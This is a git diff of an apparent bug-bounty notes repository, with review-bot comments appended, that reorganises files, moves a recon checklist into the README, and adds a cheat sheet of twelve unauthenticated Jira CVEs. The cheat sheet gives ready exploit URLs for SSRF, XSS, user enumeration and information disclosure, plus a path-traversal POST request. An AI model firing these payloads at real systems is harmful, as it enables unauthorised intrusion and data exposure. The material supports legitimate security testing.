diff --git a/Bypass 2FA.md b/Bypass/Bypass 2FA.md similarity index 100% rename from Bypass 2FA.md rename to Bypass/Bypass 2FA.md diff --git a/Bypass 403.md b/Bypass/Bypass 403.md similarity index 100% rename from Bypass 403.md rename to Bypass/Bypass 403.md diff --git a/Bypass CSRF.md b/Bypass/Bypass CSRF.md similarity index 100% rename from Bypass CSRF.md rename to Bypass/Bypass CSRF.md diff --git a/Bypass Captcha.md b/Bypass/Bypass Captcha.md similarity index 100% rename from Bypass Captcha.md rename to Bypass/Bypass Captcha.md diff --git a/Bypass File Upload.md b/Bypass/Bypass File Upload.md similarity index 100% rename from Bypass File Upload.md rename to Bypass/Bypass File Upload.md diff --git a/Bypass Rate Limit.md b/Bypass/Bypass Rate Limit.md similarity index 100% rename from Bypass Rate Limit.md rename to Bypass/Bypass Rate Limit.md diff --git a/Misc/Recon.MD b/Misc/Recon.MD deleted file mode 100644 index 3bbc6a8..0000000 --- a/Misc/Recon.MD +++ /dev/null 
@@ -1,66 +0,0 @@ -# Bug-Bounty-Recon - -## Small Scope -### Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs. like: app.harshbothra.tech -- [x] Directory Enumeration -- [x] Technology Fingerprinting -- [x] Port Scanning -- [x] Parameter Fuzzing -- [x] Wayback History -- [x] Known Vulnerabilities -- [x] Hardcoded Information in JavaScript -- [x] Domain Specific GitHub & Google Dorking -- [x] Broken Link Hijacking -- [x] Data Breach Analysis -- [x] Misconfigured Cloud Storage -## Medium Scope -### Usually the scope is wild card scope where all the subdomains are part of scope. like: Scope: *.harshbothra.tech -- [x] Subdomain Enumeration -- [x] Subdomain Takeover -- [x] Probing & Technology Fingerprinting -- [x] Port Scanning -- [x] Known Vulnerabilities -- [x] Template Based Scanning (Nuclei/Jeales) -- [x] Misconfigured Cloud Storage -- [x] Broken Link Hijacking -- [x] Directory Enumeration -- [x] Hardcoded Information in JavaScript -- [x] GitHub Reconnaissance -- [x] Google Dorking -- [x] Data Breach Analysis -- [x] Parameter Fuzzing -- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.) -- [x] IP Range Enumeration (If in Scope) -- [x] Wayback History -- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc. -- [x] Heartbleed Scanning -- [x] General Security Misconfiguration Scanning -## Large Scope -### Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization. -- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) 
​ -- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​ -- [x] Reverse Lookup -- [x] ASN & IP Space Enumeration and Service Identification​ -- [x] Subdomain Enumeration -- [x] Subdomain Takeover -- [x] Probing & Technology Fingerprinting -- [x] Port Scanning -- [x] Known Vulnerabilities -- [x] Template Based Scanning (Nuclei/Jeales) -- [x] Misconfigured Cloud Storage -- [x] Broken Link Hijacking -- [x] Directory Enumeration -- [x] Hardcoded Information in JavaScript -- [x] GitHub Reconnaissance -- [x] Google Dorking -- [x] Data Breach Analysis -- [x] Parameter Fuzzing -- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.) -- [x] IP Range Enumeration (If in Scope) -- [x] Wayback History -- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc. -- [x] Heartbleed Scanning -- [x] General Security Misconfiguration Scanning -- [x] And any possible Recon Vector (Network/Web) can be applied.​ - -Source: [Link](https://www.xmind.net/m/hKKexj/) \ No newline at end of file diff --git a/Misc/Unauthenticated Jira CVE.md b/Misc/Unauthenticated Jira CVE.md new file mode 100644 index 0000000..9d9034e --- /dev/null +++ b/Misc/Unauthenticated Jira CVE.md 
@@ -0,0 +1,62 @@ +# Unauthenticated Jira CVEs +1. CVE-2017-9506 (SSRF) +``` +https:///plugins/servlet/oauth/users/icon-uri?consumerUri= +``` +2. CVE-2018-20824 (XSS) +``` +https:///plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) +``` +3. CVE-2019-8451 (SSRF) +``` +https:///plugins/servlet/gadgets/makeRequest?url=https://:1337@example.com +``` +4. CVE-2019-8449 (User Information Disclosure) +``` +https:///rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true +``` +5. CVE-2019-8442 (Sensitive Information Disclosure) +``` +https:///s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml +``` +6. CVE-2019-3403 (User Enumeration) +``` +https:///rest/api/2/user/picker?query= +``` +7. CVE-2020-14181 (User Enumeration) +``` +https:///secure/ViewUserHover.jspa?username= +``` +8. CVE-2020-14178 (Project Key Enumeration) +``` +https:///browse. +``` +9. CVE-2020-14179 (Information Disclosure) +``` +https:///secure/QueryComponent!Default.jspa +``` +10. CVE-2019-11581 (Template Injection) +``` +/secure/ContactAdministrators!default.jspa + +* Try the SSTI Payloads +``` + +11. CVE-2019-3396 (Path Traversal) +``` +POST /rest/tinymce/1/macro/preview HTTP/1.1 +Host: {{Hostname}} +Accept: */* +Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Referer: {{Hostname}} +Content-Length: 168 +Connection: close + +{"contentId":"786457","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc5","width":"1000","height":"1000","_template":"../web.xml"}}} + +*Try above request with the Jira target +``` +12. CVE-2019-3402 (XSS) +``` +https:///secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search +``` \ No newline at end of file diff --git a/README.md b/README.md index d99cc70..83cb9b1 100644 --- a/README.md +++ b/README.md 
@@ -1,2 +1,96 @@ -# AllAboutBugBounty -All about bug websites (bypasses, payloads, and etc) +# All about bug bounty + +## List +- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Account%20Takeover.md) +- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md) +- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) +- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md) +- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md) +- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md) +- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Password%20Reset%20Flaws.md) + +## List Bypass +- [Bypass 2FA](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%202FA.md) +- [Bypass 403](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20403.md) +- [Bypass CSRF](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md) +- [Bypass Captcha](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Captcha.md) +- [Bypass File Upload](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20File%20Upload.md) +- [Bypass Rate Limit](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20Rate%20Limit.md) + +## List CMS +- [WordPress](https://github.com/daffainfo/AllAboutBugBounty/blob/master/CMS/WordPress.md) + +## List Framework +- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md) +- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD) + +## Miscellaneous +- 
[Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md) + +## Reconnaissance +* ### __Small Scope__ +Only Specific URLs are part of Scope. This usually includes staging/dev/testing or single URLs. +- [x] Directory Enumeration +- [x] Technology Fingerprinting +- [x] Port Scanning +- [x] Parameter Fuzzing +- [x] Wayback History +- [x] Known Vulnerabilities +- [x] Hardcoded Information in JavaScript +- [x] Domain Specific GitHub & Google Dorking +- [x] Broken Link Hijacking +- [x] Data Breach Analysis +- [x] Misconfigured Cloud Storage +* ### __Medium Scope__ +Usually the scope is wild card scope where all the subdomains are part of scope +- [x] Subdomain Enumeration +- [x] Subdomain Takeover +- [x] Probing & Technology Fingerprinting +- [x] Port Scanning +- [x] Known Vulnerabilities +- [x] Template Based Scanning (Nuclei/Jeales) +- [x] Misconfigured Cloud Storage +- [x] Broken Link Hijacking +- [x] Directory Enumeration +- [x] Hardcoded Information in JavaScript +- [x] GitHub Reconnaissance +- [x] Google Dorking +- [x] Data Breach Analysis +- [x] Parameter Fuzzing +- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.) +- [x] IP Range Enumeration (If in Scope) +- [x] Wayback History +- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc. +- [x] Heartbleed Scanning +- [x] General Security Misconfiguration Scanning +* ### __Large Scope__ +Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization. +- [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) 
​ +- [x] Subsidiary & Acquisition Enumeration (Depth – Max)​ +- [x] Reverse Lookup +- [x] ASN & IP Space Enumeration and Service Identification​ +- [x] Subdomain Enumeration +- [x] Subdomain Takeover +- [x] Probing & Technology Fingerprinting +- [x] Port Scanning +- [x] Known Vulnerabilities +- [x] Template Based Scanning (Nuclei/Jeales) +- [x] Misconfigured Cloud Storage +- [x] Broken Link Hijacking +- [x] Directory Enumeration +- [x] Hardcoded Information in JavaScript +- [x] GitHub Reconnaissance +- [x] Google Dorking +- [x] Data Breach Analysis +- [x] Parameter Fuzzing +- [x] Internet Search Engine Discovery (Shodan, Censys, Spyse, etc.) +- [x] IP Range Enumeration (If in Scope) +- [x] Wayback History +- [x] Potential Pattern Extraction with GF and automating further for XSS, SSRF, etc. +- [x] Heartbleed Scanning +- [x] General Security Misconfiguration Scanning +- [x] And any possible Recon Vector (Network/Web) can be applied.​ + +Source: [Link](https://www.xmind.net/m/hKKexj/) + +## Coming Soon! \ No newline at end of file
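Review bot: The `Misc/Recon.MD` deletion drops two details that the copy added to `README.md` does not carry over: the scope examples in the sub-headings (`like: app.harshbothra.tech` under Small Scope and `Scope: *.harshbothra.tech` under Medium Scope). If the move is intentional, the commit should say the content now lives in the README; otherwise restore those examples there so the reorganization is content-preserving. Two defects in the deleted text are also being copied verbatim rather than fixed on the way: `Template Based Scanning (Nuclei/Jeales)` misspells the Jaeles scanner, and the checklist lines carry invisible zero-width characters (before `Subsidiary & Acquisition Enumeration`, after `Service Identification` and after `can be applied.`) that will survive into the README and break copy/paste and search.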
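Review bot: In the new `Misc/Unauthenticated Jira CVE.md`, every example URL has an empty host (`https:///plugins/servlet/...`) and the parameter values that are meant to be filled in (`consumerUri=`, `query=`, `username=`, and the truncated `https:///browse.` under CVE-2020-14178) have been stripped, so a reader cannot tell which part is a placeholder; use a visible token such as `https://<target>/...` consistently, as item 11 already does with `{{Hostname}}`. Items 10 and 11 put prose (`* Try the SSTI Payloads`, `*Try above request with the Jira target`) inside the code fences, which renders it as code; close the fence first and put the note below it. The request in item 11 also has two headers run onto one line (`Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 ...`), and its `Content-Length: 168` does not match the JSON body shown, so the request will not replay as written. Finally, CVE-2019-3396 (`/rest/tinymce/1/macro/preview`, Widget Connector `_template` path traversal) is a Confluence Server issue, not a Jira one; it belongs in a separate Confluence file or the heading should be widened, otherwise the list misleads anyone using it to assess a Jira instance.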
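Review bot: In the `README.md` hunk the `Exposed Source Code` entry links to `Denial%20Of%20Service.md`, the same target as the `Denial of Service (DoS)` entry directly above it, so it is almost certainly a copy-paste error and should point at the Exposed Source Code document (no such file is added in this patch, so either add it or drop the entry). The `Zend` link uses `Framework/Zend.MD` while every other link uses a lowercase `.md` extension; GitHub paths are case-sensitive, so confirm the file really is named `Zend.MD` or rename it for consistency. The Reconnaissance section mixes a bullet with a heading (`* ### __Small Scope__`), and the recon items are all rendered as checked task-list boxes (`- [x]`), which in a README reads as "already done" rather than as a checklist; plain bullets or unchecked boxes (`- [ ]`) would express the intent better. The `Nuclei/Jeales` misspelling (Jaeles) and the zero-width characters from the deleted file are reproduced here too, and the trailing `## Coming Soon!` is an empty heading with no newline at end of file.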